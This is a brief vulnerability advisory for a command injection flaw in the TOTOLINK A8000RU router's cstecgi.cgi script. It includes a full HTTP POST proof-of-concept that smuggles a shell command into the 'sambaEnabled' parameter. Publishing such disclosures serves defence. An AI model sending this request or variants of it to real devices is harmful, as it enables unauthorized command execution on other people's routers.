# Summary of Command Injection Vulnerability in A8000RU ## Vulnerability Overview A command injection vulnerability was discovered in the `cstecgi.cgi` script of the TOTOLINK A8000RU router. Attackers can exploit the `sambaEnabled` parameter to inject arbitrary operating system commands by crafting malicious requests. ## Affected Scope * **Vendor**: TOTOLINK * **Product**: A8000RU * **Version**: 7.1.c1.643_b20200521 ## Remediation * The page does not provide specific remediation steps or patch information. ## Proof of Concept (PoC) **HTTP Request Example:** ```http POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.6.2 Content-Length: 77 X-Requested-With: XMLHttpRequest Accept-Language: en-US,en;q=0.9 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.6.2 Referer: http://192.168.6.2/basic/index.html Accept-Encoding: gzip, deflate, br Cookie: SESSION_ID=1772400702:2 Connection: keep-alive {"topicUrl":"setStorageCfg","sambaEnabled":"\ls>./setStorageCfg.txt"} ``` **Exploitation Principle:** By setting the `sambaEnabled` parameter to `\ls>./setStorageCfg.txt`, the router executes this command, thereby generating a `setStorageCfg.txt` file in the directory containing the list of files.